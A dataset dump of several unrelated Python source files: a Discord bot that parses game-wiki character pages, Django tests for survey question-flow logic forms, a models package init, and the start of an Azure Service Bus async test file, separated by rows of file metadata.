embed.set_thumbnail(url=image)
# Advanced lookup
if not simple:
# Generate advanced information
obtain = await generateobtain(source)
ca = await generateca(source)
skills = await generateskills(source)
supskills = await generatesupskills(source)
# Put it together
embed.add_field(name="How to Recruit", value=obtain, inline=True)
embed.add_field(name="Charge Attack" + ca[0], value=ca[1], inline=True)
# See comment in generateskills
for skill in skills:
embed.add_field(name=skill[0], value=skill[1], inline=False)
embed.add_field(name="Support Skills", value=supskills, inline=False)
async def generateicons(categories: list, embed: discord.Embed) \
-> None:
text = ""
cat_map = {
# Rarity icons
"SSR Characters": " <:Rarity_SSR:730441789667934278>",
"SR Characters": " <:Rarity_SR:730441789319807009>",
"R Characters": " <:Rarity_R:730441789642768464>",
# Element icons
"Fire Characters": " <:Fire:730845600484032624>",
"Water Characters": " <:Water:730845600324780151>",
"Earth Characters": " <:Earth:730845600672776202>",
"Wind Characters": " <:Wind:730845600479707157>",
"Light Characters": " <:Light:730845600915914873>",
"Dark Characters": " <:Dark:730845600613924954>",
# Category icons
"Summer Characters": " <:Summer:793505682250661929>",
"Yukata Characters": " <:Yukata:793506721817034763>",
"Valentine Characters": " <:Valentine:793507530185768980>",
"Halloween Premium Draw Characters": " <:Halloween:793508939723309058>",
"Holiday Premium Draw Characters": " <:Holiday:793509924922720287>",
"Zodiac Characters": " <:Zodiac:793510822282133565>",
"Grand Series Characters": " <:Grand:793511553026359316>",
"Fantasy Characters": " <:Fantasy:793511553134624788>",
"Collaboration Characters": " <:TieIn:793504971173527582>",
"The Eternals": " <:Eternals:793503906347876362>",
"Arcarum Evokers": " <:Evokers:793501266054479913>",
# Race icons
"Draph Characters":
" <:Draph1:731182416441376808><:Draph2:731182416475193464>"
"<:Draph3:731182416407822376><:Draph4:731182416030466070>",
"Erune Characters":
" <:Erune1:731181941662941184><:Erune2:731181942170583060>"
"<:Erune3:731181941474197505><:Erune4:731181941646426133>",
"Harvin Characters":
" <:Harvin1:731177969992859844><:Harvin2:731177970177278023>"
"<:Harvin3:731177970416353280><:Harvin4:731177970353569854>",
"Human Characters":
" <:Human1:731174811774091304><:Human2:731174811518238822>"
"<:Human3:731174811648262155><:Human4:731174811857977384>",
"Other Characters":
" <:Unknown1:731183072850083942><:Unknown2:731183073026375811>"
"<:Unknown3:731183073101742110><:Unknown4:731183072862666813>",
"Primal Characters":
" <:Primal1:731173612035244052><:Primal2:731173611918065684>"
"<:Primal3:731173290848157696><:Primal4:731173290806214736>",
# Weapon proficiency icons
"Sabre Characters":
" <:Sabre1:730454365248159855><:Sabre2:730454663941324861>",
"Dagger Characters":
" <:Dagger1:730455370233020558><:Dagger2:730455370673291314>",
"Spear Characters":
" <:Spear1:730456104898920458><:Spear2:730456104840200363>",
"Axe Characters":
" <:Axe1:730456397942095943><:Axe2:730456397556482110>",
"Staff Characters":
" <:Staff1:730456836221829173><:Staff2:730456836310040677>",
"Gun Characters":
" <:Gun1:730457164552077382><:Gun2:730457164266864784>",
"Melee Characters":
" <:Melee1:730457549672939621><:Melee2:730457549337264139>",
"Bow Characters":
" <:Bow1:730457814627254322><:Bow2:730457814551756840>",
"Harp Characters":
" <:Harp1:730458095591096420><:Harp2:730458095221997580>",
"Katana Characters":
" <:Katana1:730458503742750822><:Katana2:730458504011317319>",
# 5★ uncap icons
"5★ Characters": " <:BlueStar:739887435936301152>",
}
for cat in categories:
if cat in cat_map.keys():
text += cat_map[cat]
embed.description = text + "\n"
async def generateobtain(source: str) -> str:
# Trim
raw = source[source.find("How to Recruit") + 14:].split("</tbody>", 1)[0]
parsed = BeautifulSoup(raw, 'html.parser')
# Get information and put it together
link = parsed.find("a")["href"]
text = parsed.find("a").text
obtain = "[" + text + "](https://gbf.wiki" + link + ")"
# If the character is obtained via a recruitment weapon, get that too.
if "Recruitment Weapon" in parsed.text:
recruit = parsed.find("span", {"class": "image_link"})
link = recruit.find("a")["href"]
text = recruit.text.strip()
obtain += "\n**Recruitment Weapon**\n[" + text + "](https://gbf.wiki" \
+ link + ")"
return obtain
async def generateca(source: str) -> list:
# Empty variables to be filled later
name = ""
output = []
outputtext = ""
# Trim the source
raw = source[source.find("/Charge_Attack"):].split("</tbody>", 1)[0]
parsed = BeautifulSoup(raw, 'html.parser')
# Miscellaneous cleaning
removetooltip(parsed)
removecitation(parsed)
iconreplace(parsed)
# Check if the CA eventually gets another name
if len(parsed.find_all("td", {"class": "skill-name"})) > 1:
namechange = True
else:
namechange = False
for tr in parsed.find_all("tr"):
# If the row has styling, it's a dud row
if tr.get("style"):
continue
# If the row has a "skill" upgrade, add it in mark it as such, then
# Remove it to prevent double inclusion
if tr.find("td", {"class": "skill-name"}) and not namechange:
name = " - " + tr.find("td", {"class": "skill-name"}).text
tr.find("td", {"class": "skill-name"}).replace_with("")
if tr.find("span", {"class": "skill-upgrade-text"}):
if namechange:
outputtext += "__" + tr.find("span", {"class":
"skill-upgrade-text"}).text + \
"__\n"
tr.find("span", {"class": "skill-upgrade-text"})\
.replace_with("")
else:
tr.find("span", {"class": "skill-upgrade-text"}) \
.replace_with("\n__" + tr.find("span", {"class":
"skill-upgrade-text"}).text + "__\n")
td = tr.find("td", {"style": "text-align:left;"})
for br in td.find_all("br"):
br.replace_with(" ")
if namechange:
outputtext += "**" + tr.find("td", {"class": "skill-name"}).text + \
":** " + td.text + "\n"
else:
outputtext += td.text
output.append(name)
output.append(outputtext)
return output
async def generateskills(source) -> list:
# Skills are too big to put in one field, so this generates the information
# for each skill to be displayed in its own field.
output = []
# Trim to what's needed
raw = source[source.find("<span class=\"mw-headline\" id=\"Skills\">"):]\
.split("</tbody>", 1)[0]
parsed = BeautifulSoup(raw, "html.parser")
parsed = parsed.find("table")
# Miscellaneous cleaning
removetooltip(parsed)
removecitation(parsed)
iconreplace(parsed)
# Skill counter and text buffer for the skill info
i = 1
skillinfo = ""
for tr in parsed.find_all("tr"):
if tr.find_all("th"):
continue
if tr.get("class"):
continue
# Get the cell with the skill name
td = tr.find("td", {"class": "skill-name"})
# Handle any skill name changes
for span in td.find_all("span", {"class": "skill-upgrade-text"}):
for br in span.find_all("br"):
br.replace_with(" ")
span.replace_with("/" + span.text)
skillname = "Skill " + str(i) + ": " + td.text.strip()
# The next three cells don't have a class identifier, so you just have
# to hope the table format stays consistent with all cases
td = tr.find_all("td", {"class": None})
# The first unmarked cell is for the cooldown, which needs handling of
# potential cooldown reductions and linked skills
for span in td[0].find_all("span"):
if "Linked" not in span.text:
span.replace_with("/" + span.text + " ")
else:
span.replace_with("(Linked Skill) ")
skillinfo += "Cooldown: " + td[0].text + "\n"
# The second unmarked cell is for the duration, which needs handling of
# potential upgrades
for span in td[1].find_all("span"):
span.replace_with("/" + span.text + " ")
skillinfo += "Duration: " + td[1].text + "\n"
for span in td[2].find_all("span"):
span.replace_with("/" + span.text)
# The third unmarked cell is for the obtain level, which also includes
# potential upgrades
skillinfo += "Obtained: " + td[2].text + "\n"
# The cell with skill information apparently doesn't have an identifier,
# but it DOES always have a specific styling.
td = tr.find("td", {"style": "text-align:left;"})
for br in td.find_all("br"):
br.replace_with(" ")
for span in td.find_all("span", {"class": "skill-upgrade-text"}):
span.replace_with("\n__" + span.text + "__")
skillinfo += td.text + "\n"
output.append((skillname, skillinfo))
skillinfo = ""
i += 1
return output
async def generatesupskills(source: str) -> str:
output = ""
raw = source[source.find
("<span class=\"mw-headline\" id=\"Support_Skills\">"):] \
.split("</tbody>", 1)[0]
parsed = BeautifulSoup(raw, "html.parser")
parsed = parsed.find("table")
removetooltip(parsed)
removecitation(parsed)
iconreplace(parsed)
for tr in parsed.find_all("tr"):
if tr.find_all("th"):
continue
if tr.get("class"):
continue
output += "**" + tr.find("td", {"class": "skill-name"}).text.strip() + \
"**\n"
if "Extended" in tr.find("td", {"class": "skill-name"}).text:
td = tr.find_all("td", {"style": ""})[1]
else:
td = tr.find_all("td", {"style": ""})[2]
for span in td.find_all("span", {"class": "tooltip"}):
span.replace_with("/" + span.text)
output += "Obtained: " + td.text.strip() + "\n"
td = tr.find("td", {"style": "text-align:left;"})
for span in td.find_all("span", {"class": "skill-upgrade-text"}):
span.replace_with("\n__" + span.text + "__")
for br in td.find_all("br"):
br.replace_with(" ")
output += td.text + "\n"
return output
>>>>>>> 6827d3cd437626be73cda161510a41dd519548a8:character.py
| 43.736749
| 81
| 0.575843
| 2,543
| 24,755
| 5.556036
| 0.152182
| 0.019817
| 0.011324
| 0.018119
| 0.994692
| 0.994692
| 0.994692
| 0.994692
| 0.994692
| 0.994692
| 0
| 0.140888
| 0.276308
| 24,755
| 565
| 82
| 43.814159
| 0.647558
| 0.125429
| 0
| 0.988914
| 0
| 0
| 0.333803
| 0.172634
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.013304
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9f359f0f6dc9121a692cb7584b25dd3ada899151
| 24,394
|
py
|
Python
|
survey/tests/forms/test_question_logic_form.py
|
ericazhou7/uSurvey
|
1236f33355662957e7e1e769dde1811b910673a5
|
[
"BSD-3-Clause"
] | 5
|
2016-08-25T12:48:54.000Z
|
2018-08-16T22:49:43.000Z
|
survey/tests/forms/test_question_logic_form.py
|
ericazhou7/uSurvey
|
1236f33355662957e7e1e769dde1811b910673a5
|
[
"BSD-3-Clause"
] | 2
|
2016-08-11T06:43:56.000Z
|
2016-12-08T09:11:36.000Z
|
survey/tests/forms/test_question_logic_form.py
|
ericazhou7/uSurvey
|
1236f33355662957e7e1e769dde1811b910673a5
|
[
"BSD-3-Clause"
] | 7
|
2016-09-16T11:03:44.000Z
|
2020-10-28T22:01:20.000Z
|
from model_mommy import mommy
from datetime import datetime, date, timedelta
from django.test import TestCase
from survey.models import *
from survey.models.backend import Backend
from survey.forms.logic import LogicForm, LoopingForm
class LogicFormTest(TestCase):
def setUp(self):
# create some questions
self.survey = Survey.objects.create(name='test')
self.batch = Batch.objects.create(name='test', survey=self.survey)
self.module = QuestionModule.objects.create(name='test')
self.qset = QuestionSet.objects.create(name="Females")
QuestionSetChannel.objects.create(qset=self.qset, channel=ODKAccess.choice_name())
self.rsp = ResponseValidation.objects.create(validation_test="validationtest",
constraint_message="message")
def test_correct_validators_is_applied_as_per_question_answer_type(self):
answer_types = Answer.supported_answers() # different types of questions
for answer_type in answer_types:
q = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier=answer_type.choice_name(), text='test',
answer_type=answer_type.choice_name())
l = LogicForm(q)
answer_choice_names = [(validator.__name__, validator.__name__.upper())
for validator in answer_type.validators()]
self.assertEqual(set(l.fields['condition'].choices), set(answer_choice_names))
def test_logic_form_has_options_for_multi_type_questions(self):
for answer_type in [MultiSelectAnswer.choice_name(), MultiChoiceAnswer.choice_name()]:
q = Question.objects.create(identifier=answer_type, text="text", answer_type=answer_type,
qset_id=self.qset.id, response_validation_id=1)
l = LogicForm(q)
self.assertTrue(l.fields.get('option'))
def test_logic_form_does_not_have_options_for_non_multi_type_questions(self):
answer_types = Answer.answer_types()
for answer_type in answer_types:
if answer_type not in [MultiSelectAnswer.choice_name(), MultiChoiceAnswer.choice_name()]:
q = Question.objects.create(identifier=answer_type, text="text", answer_type=answer_type,
qset_id=self.qset.id, response_validation_id=1)
l = LogicForm(q)
self.assertFalse(l.fields.get('option'))
def test_skip_logic_selection_in_form_question_creates_skip_flow(self):
'''
:return:
'''
q1 = Question.objects.create(qset=self.qset, response_validation=self.rsp,identifier='test1',
text='test1', answer_type=NumericalAnswer.choice_name())
q2 = Question.objects.create(qset=self.qset, response_validation=self.rsp,
identifier='test2',
text='test2', answer_type=NumericalAnswer.choice_name())
q3 = Question.objects.create(qset=self.qset, response_validation=self.rsp,
identifier='test3',
text='test3', answer_type=NumericalAnswer.choice_name())
q4 = Question.objects.create(qset=self.qset, response_validation=self.rsp,
identifier='test4',
text='test4', answer_type=NumericalAnswer.choice_name())
q5 = Question.objects.create(qset=self.qset, response_validation=self.rsp,
identifier='test5',
text='test5', answer_type=NumericalAnswer.choice_name())
test_condition = NumericalAnswer.validators()[0].__name__
test_param = '15'
form_data = {
'action': LogicForm.SKIP_TO,
'condition': test_condition,
'value': test_param
}
self.qset.start_question = q1
self.qset.save()
QuestionFlow.objects.create(question=q1, next_question=q2)
QuestionFlow.objects.create(question=q2, next_question=q3)
QuestionFlow.objects.create(question=q3, next_question=q4)
QuestionFlow.objects.create(question=q4, next_question=q5)
form = LogicForm(q1, data=form_data)
self.assertFalse(form.is_valid())
self.assertIn('next_question', form.errors)
form_data['next_question'] = q4.pk
form = LogicForm(q1, data=form_data)
self.assertTrue(form.is_valid())
form.save()
self.assertTrue(QuestionFlow.objects.filter(question_id=q1.id, next_question_id=q4.id).exists())
qf = QuestionFlow.objects.get(question_id=q1.id, next_question_id=q4.id)
self.assertTrue(qf.text_arguments.filter(param=test_param).exists())
def test_subquestion_selection_in_form_question_creates_branch_flow(self):
'''
:return:
'''
q1 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test1',
text='test1', answer_type=TextAnswer.choice_name())
q2 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test2',
text='test2', answer_type=TextAnswer.choice_name())
q3 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test3',
text='test3', answer_type=TextAnswer.choice_name())
q4 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test4',
text='test4', answer_type=TextAnswer.choice_name())
q5 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test5',
text='test5', answer_type=TextAnswer.choice_name())
self.qset.start_question = q1
self.qset.save()
QuestionFlow.objects.create(question_id=q1.id, next_question_id=q3.id)
QuestionFlow.objects.create(question_id=q3.id, next_question_id=q5.id)
test_condition = TextAnswer.validators()[0].__name__
test_param = 'Hey you!!'
form_data = {
'action': LogicForm.ASK_SUBQUESTION,
'next_question': q4.pk,
'condition': test_condition,
'value': test_param
}
form = LogicForm(q1, data=form_data)
self.assertTrue(form.is_valid())
form.save()
self.assertTrue(QuestionFlow.objects.filter(question_id=q1.id, next_question_id=q4.id).exists())
qf = QuestionFlow.objects.get(question_id=q1.id, next_question_id=q4.id)
self.assertTrue(qf.text_arguments.filter(param=test_param).exists())
def test_reanswer_selection_in_form_question_creates_flow_to_same_question(self):
'''
:return:
'''
q1 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test1',
text='test1', answer_type=DateAnswer.choice_name())
q2 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test2',
text='test2', answer_type=DateAnswer.choice_name())
q3 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test3',
text='test3', answer_type=DateAnswer.choice_name())
q4 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test4',
text='test4', answer_type=DateAnswer.choice_name())
q5 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test5',
text='test5', answer_type=DateAnswer.choice_name())
self.qset.start_question = q1
self.qset.save()
QuestionFlow.objects.create(question_id=q1.id, next_question_id=q2.id)
QuestionFlow.objects.create(question_id=q2.id, next_question_id=q3.id)
QuestionFlow.objects.create(question_id=q3.id, next_question_id=q4.id)
QuestionFlow.objects.create(question_id=q4.id, next_question_id=q5.id)
test_condition = 'between'
test_param_upper = datetime.now()
test_param_lower = datetime.now() - timedelta(days=3)
form_data = {
'action': LogicForm.REANSWER,
'condition': test_condition,
'min_value': test_param_lower,
'max_value': test_param_upper
}
form = LogicForm(q2, data=form_data)
self.assertTrue(form.is_valid())
form.save()
self.assertTrue(QuestionFlow.objects.filter(question_id=q2.id, next_question_id=q2.id).exists())
def test_end_interview_selection_in_form_question_creates_flow_to_with_no_next_question(self):
yes = 'yes'
no = 'no'
q1 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test1',
text='test1', answer_type=DateAnswer.choice_name())
q2 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test2',
text='test2', answer_type=MultiChoiceAnswer.choice_name())
q_o1 = QuestionOption.objects.create(question_id=q2.id, text=yes, order=1)
QuestionOption.objects.create(question_id=q2.id, text=no, order=2)
q3 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test3',
text='test3', answer_type=DateAnswer.choice_name())
q4 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test4',
text='test4', answer_type=DateAnswer.choice_name())
q5 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test5',
text='test5', answer_type=DateAnswer.choice_name())
self.qset.start_question = q1
self.qset.save()
QuestionFlow.objects.create(question=q1, next_question=q2)
QuestionFlow.objects.create(question=q2, next_question=q3)
QuestionFlow.objects.create(question=q3, next_question=q4)
QuestionFlow.objects.create(question=q4, next_question=q5)
test_condition = MultiChoiceAnswer.validators()[0].__name__
form_data = {
'action': LogicForm.END_INTERVIEW,
'condition': test_condition,
'option': q_o1.text
}
logic_form = LogicForm(q2, data=form_data)
self.assertTrue(logic_form.is_valid())
logic_form.save()
self.assertTrue(QuestionFlow.objects.filter(question=q2, next_question__isnull=True).exists())
def test_attempt_to_set_incorrect_value_gives_form_error(self):
'''
:return:
'''
q1 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test1',
text='test1', answer_type=NumericalAnswer.choice_name())
q2 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test2',
text='test2', answer_type=NumericalAnswer.choice_name())
q3 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test3',
text='test3', answer_type=NumericalAnswer.choice_name())
q4 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test4',
text='test4', answer_type=NumericalAnswer.choice_name())
q5 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test5',
text='test5', answer_type=NumericalAnswer.choice_name())
test_condition = NumericalAnswer.validators()[0].__name__
test_param = '6267fe'
form_data = {
'action': LogicForm.SKIP_TO,
'next_question': q4.pk,
'condition': test_condition,
'value': test_param
}
self.qset.start_question = q1
self.qset.save()
QuestionFlow.objects.create(question=q1, next_question=q2)
QuestionFlow.objects.create(question=q2, next_question=q3)
QuestionFlow.objects.create(question=q3, next_question=q4)
QuestionFlow.objects.create(question=q4, next_question=q5)
l = LogicForm(q1, data=form_data)
self.assertFalse(l.is_valid())
def test_specify_wrong_max_value_gives_form_error(self):
q1 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test1',
text='test1', answer_type=DateAnswer.choice_name())
q2 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test2',
text='test2', answer_type=DateAnswer.choice_name())
q3 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test3',
text='test3', answer_type=DateAnswer.choice_name())
q4 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test4',
text='test4', answer_type=DateAnswer.choice_name())
q5 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test5',
text='test5', answer_type=DateAnswer.choice_name())
self.qset.start_question = q1
self.qset.save()
QuestionFlow.objects.create(question_id=q1.id, next_question_id=q2.id)
QuestionFlow.objects.create(question_id=q2.id, next_question_id=q3.id)
QuestionFlow.objects.create(question_id=q3.id, next_question_id=q4.id)
QuestionFlow.objects.create(question_id=q4.id, next_question_id=q5.id)
test_condition = 'between'
test_param_upper = 'now()'
test_param_lower = datetime.now() - timedelta(days=3)
form_data = {
'action': LogicForm.REANSWER,
'condition': test_condition,
'min_value': test_param_lower,
'max_value': test_param_upper
}
l = LogicForm(q2, data=form_data)
self.assertFalse(l.is_valid())
def test_specify_wrong_min_value_gives_form_error(self):
'''
:return:
'''
q1 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test1',
text='test1', answer_type=DateAnswer.choice_name())
q2 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test2',
text='test2', answer_type=DateAnswer.choice_name())
q3 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test3',
text='test3', answer_type=DateAnswer.choice_name())
q4 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test4',
text='test4', answer_type=DateAnswer.choice_name())
q5 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test5',
text='test5', answer_type=DateAnswer.choice_name())
self.qset.start_question = q1
self.qset.save()
QuestionFlow.objects.create(question_id=q1.id, next_question_id=q2.id)
QuestionFlow.objects.create(question_id=q2.id, next_question_id=q3.id)
QuestionFlow.objects.create(question_id=q3.id, next_question_id=q4.id)
QuestionFlow.objects.create(question_id=q4.id, next_question_id=q5.id)
test_condition = 'between'
test_param_upper = datetime.now()
test_param_lower = 'some time ago'
form_data = {
'action': LogicForm.REANSWER,
'condition': test_condition,
'min_value': test_param_lower,
'max_value': test_param_upper
}
l = LogicForm(q2, data=form_data)
self.assertFalse(l.is_valid())
def test_skip_logic_btween_question_groups_not_allowed(self):
'''
:return:
'''
group = mommy.make(RespondentGroup)
q1 = BatchQuestion.objects.create(qset=self.batch, response_validation=self.rsp, identifier='test1',
text='test1', answer_type=NumericalAnswer.choice_name())
q2 = BatchQuestion.objects.create(qset=self.batch, response_validation=self.rsp,
identifier='test2', text='test2', answer_type=NumericalAnswer.choice_name())
q3 = BatchQuestion.objects.create(qset=self.batch, response_validation=self.rsp, identifier='test3',
text='test3', answer_type=NumericalAnswer.choice_name())
q4 = BatchQuestion.objects.create(qset=self.batch, response_validation=self.rsp, identifier='test45',
text='test45', answer_type=NumericalAnswer.choice_name(), group=group)
q5 = BatchQuestion.objects.create(qset=self.batch, response_validation=self.rsp, identifier='test5',
text='test5', answer_type=NumericalAnswer.choice_name())
test_condition = NumericalAnswer.validators()[0].__name__
test_param = '15'
form_data = {
'action': LogicForm.SKIP_TO,
'next_question': q4.pk,
'condition': test_condition,
'value': test_param
}
self.batch.start_question = q1
self.batch.save()
QuestionFlow.objects.create(question_id=q1.id, next_question_id=q2.id)
QuestionFlow.objects.create(question_id=q2.id, next_question_id=q3.id)
QuestionFlow.objects.create(question_id=q3.id, next_question_id=q4.id)
QuestionFlow.objects.create(question_id=q4.id, next_question_id=q5.id)
form = LogicForm(q1, data=form_data)
self.assertFalse(form.is_valid())
self.assertIn('between questions of different groups is not allowed', form.errors['next_question'][0])
class LoopFlowExtra(TestCase):
def setUp(self):
# create some questions
self.survey = Survey.objects.create(name='test')
self.batch = Batch.objects.create(name='test', survey=self.survey)
self.module = QuestionModule.objects.create(name='test')
self.qset = QuestionSet.objects.create(name="Females")
QuestionSetChannel.objects.create(qset=self.qset, channel=ODKAccess.choice_name())
def test_loop_form_fixed_count(self):
q1 = BatchQuestion.objects.create(qset=self.batch, identifier='test1',
text='test1', answer_type=NumericalAnswer.choice_name())
q2 = BatchQuestion.objects.create(qset=self.batch, response_validation_id=1,
identifier='test2', text='test2', answer_type=NumericalAnswer.choice_name())
q3 = BatchQuestion.objects.create(qset=self.batch, response_validation_id=1, identifier='test3',
text='test3', answer_type=NumericalAnswer.choice_name())
q4 = BatchQuestion.objects.create(qset=self.batch, response_validation_id=1, identifier='test45',
text='test45', answer_type=NumericalAnswer.choice_name())
q5 = BatchQuestion.objects.create(qset=self.batch, response_validation_id=1, identifier='test5',
text='test5', answer_type=NumericalAnswer.choice_name())
self.batch.start_question = q1
self.batch.save()
QuestionFlow.objects.create(question_id=q1.id, next_question_id=q2.id)
QuestionFlow.objects.create(question_id=q2.id, next_question_id=q3.id)
QuestionFlow.objects.create(question_id=q3.id, next_question_id=q4.id)
QuestionFlow.objects.create(question_id=q4.id, next_question_id=q5.id)
form_data = {
'loop_starter': q1.id,
'loop_ender': q4.pk,
'repeat_logic': LoopingForm.FIXED_COUNT,
}
form = LoopingForm(q1, data=form_data)
self.assertFalse(form.is_valid())
self.assertIn('repeat count is required', form.errors.values()[0])
form_data['repeat_count'] = 5
form = LoopingForm(q1, data=form_data)
self.assertTrue(form.is_valid())
form.save()
self.assertEquals(QuestionLoop.objects.count(), 1)
self.assertTrue(QuestionLoop.objects.filter(loop_starter=q1, loop_ender=q4).exists())
def test_loop_form_previous_question(self):
q1 = BatchQuestion.objects.create(qset=self.batch, identifier='test1',
text='test1', answer_type=NumericalAnswer.choice_name())
q2 = BatchQuestion.objects.create(qset=self.batch, response_validation_id=1,
identifier='test2', text='test2', answer_type=TextAnswer.choice_name())
q3 = BatchQuestion.objects.create(qset=self.batch, response_validation_id=1, identifier='test3',
text='test3', answer_type=NumericalAnswer.choice_name())
q4 = BatchQuestion.objects.create(qset=self.batch, response_validation_id=1, identifier='test45',
text='test45', answer_type=NumericalAnswer.choice_name())
q5 = BatchQuestion.objects.create(qset=self.batch, response_validation_id=1, identifier='test5',
text='test5', answer_type=NumericalAnswer.choice_name())
self.batch.start_question = q1
self.batch.save()
QuestionFlow.objects.create(question_id=q1.id, next_question_id=q2.id)
QuestionFlow.objects.create(question_id=q2.id, next_question_id=q3.id)
QuestionFlow.objects.create(question_id=q3.id, next_question_id=q4.id)
QuestionFlow.objects.create(question_id=q4.id, next_question_id=q5.id)
form_data = {
'loop_starter': q3.pk,
'loop_ender': q5.pk,
'repeat_logic': LoopingForm.PREVIOUS_ANSWER_COUNT,
}
form = LoopingForm(q3, data=form_data)
self.assertFalse(form.is_valid())
form_data['previous_numeric_values'] = q2.id
form = LoopingForm(q3, data=form_data)
self.assertFalse(form.is_valid()) # only numeric answers are allowed as previous questions
form_data['previous_numeric_values'] = q1.id
form = LoopingForm(q3, data=form_data)
self.assertTrue(form.is_valid())
form.save()
self.assertEquals(QuestionLoop.objects.filter(loop_starter=q3, loop_ender=q5).count(), 1)
self.assertTrue(QuestionLoop.objects.filter(loop_starter=q3, loop_ender=q5).exists())
| 58.080952
| 118
| 0.604944
| 2,656
| 24,394
| 5.311747
| 0.069277
| 0.095832
| 0.063864
| 0.061029
| 0.874894
| 0.860363
| 0.853133
| 0.843706
| 0.825347
| 0.810604
| 0
| 0.020192
| 0.289415
| 24,394
| 420
| 119
| 58.080952
| 0.7937
| 0.007461
| 0
| 0.728947
| 0
| 0
| 0.047403
| 0.001911
| 0
| 0
| 0
| 0
| 0.078947
| 1
| 0.039474
| false
| 0
| 0.015789
| 0
| 0.060526
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9f440d654293f738ef8999d27ac29c4e965449b9
| 219
|
py
|
Python
|
ecobasa/models/__init__.py
|
ecobasa/ecobasa
|
849e9a340e20bc83386a492052c41573b493eb11
|
[
"BSD-3-Clause"
] | 18
|
2015-06-04T07:22:38.000Z
|
2019-08-22T07:47:25.000Z
|
ecobasa/models/__init__.py
|
ecobasa/ecobasa
|
849e9a340e20bc83386a492052c41573b493eb11
|
[
"BSD-3-Clause"
] | 49
|
2015-05-30T11:26:38.000Z
|
2022-03-11T23:17:36.000Z
|
ecobasa/models/__init__.py
|
ecobasa/ecobasa
|
849e9a340e20bc83386a492052c41573b493eb11
|
[
"BSD-3-Clause"
] | 6
|
2015-08-07T15:09:26.000Z
|
2017-07-22T21:25:48.000Z
|
# -*- coding: utf-8 -*-
from .caravan import * # noqa
from .slideshow import * # noqa
from .organiser import * # noqa
from .profile import * # noqa
from .reference import * # noqa
from .slideshow import * # noqa
| 24.333333
| 32
| 0.657534
| 27
| 219
| 5.333333
| 0.407407
| 0.416667
| 0.486111
| 0.319444
| 0.458333
| 0.458333
| 0
| 0
| 0
| 0
| 0
| 0.005848
| 0.219178
| 219
| 8
| 33
| 27.375
| 0.836257
| 0.232877
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9f8c42172cd62e5ceddbf2064332857a10f08bc4
| 41,705
|
py
|
Python
|
sdk/servicebus/azure-servicebus/tests/async_tests/test_queues_async.py
|
pjquirk/azure-sdk-for-python
|
cbf02ec4f177b96eae1dbbba87c34c2c93880150
|
[
"MIT"
] | 1
|
2021-09-07T18:36:04.000Z
|
2021-09-07T18:36:04.000Z
|
sdk/servicebus/azure-servicebus/tests/async_tests/test_queues_async.py
|
pjquirk/azure-sdk-for-python
|
cbf02ec4f177b96eae1dbbba87c34c2c93880150
|
[
"MIT"
] | 2
|
2019-10-02T23:37:38.000Z
|
2020-10-02T01:17:31.000Z
|
sdk/servicebus/azure-servicebus/tests/async_tests/test_queues_async.py
|
xiafu-msft/azure-sdk-for-python
|
4d9560cfd519ee60667f3cc2f5295a58c18625db
|
[
"MIT"
] | null | null | null |
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import asyncio
import logging
import sys
import os
import pytest
import time
from datetime import datetime, timedelta
from azure.servicebus.aio import (
ServiceBusClient,
QueueClient,
Message,
